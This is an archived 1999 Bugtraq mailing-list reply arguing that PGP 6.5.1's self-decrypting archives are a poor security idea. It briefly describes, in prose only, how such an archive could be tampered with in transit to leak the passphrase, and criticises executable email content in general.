[11006] in bugtraq
Re: PGP 6.5.1 has been released
daemon@ATHENA.MIT.EDU (Mark Wooding)
Tue Jul 13 14:13:01 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <14219.869.178793.725790@catbert.ebi.ac.uk>
Date: Tue, 13 Jul 1999 10:14:13 +0100
Reply-To: Mark Wooding <mdw@EBI.AC.UK>
From: Mark Wooding <mdw@EBI.AC.UK>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19990711140519.76348.qmail@hotmail.com>
___Viper___ _ <viper_____@HOTMAIL.COM> wrote:
> "Having the option" never hurt anyone. You can produce SDAs, and use
> them if you wish, AND you can NOT open executables that arrived in
> your mailbox and you don't trust.
In this particular case, it's even sillier than usual.
There's now an active attack against symmetric passphrases. I can
fiddle with an SDA in transit so that it does its job normally and also
emails me the passphrase that successfully decrypted the archive.
So basically it's `protected by PGP's strong cryptography' which is
entirely wasted by a brain-damaged idea that some marketroid probably
thought would look kewl with a tick in the box next to it.
And that's without Steven Bellovin's completely legitimate concerns
about `executable content' in general: rich computing experiences and
all that.
Duh.
> It's madness to say that it is a "security threat". With your logic,
> e-mailing is a security threat as well ;-) Who knows what you can send
> over e-mail !
Quite so. I make sure that my mail reader won't do anything with a
message other than display it in a text window until I've had a chance
to examine it and decide what should happen next.
Executable email messages are one of the worst ideas I've ever heard
of. And that's saying something.
[Thanks to Clive Jones, who came up with the attack above.]
-- [mdw]
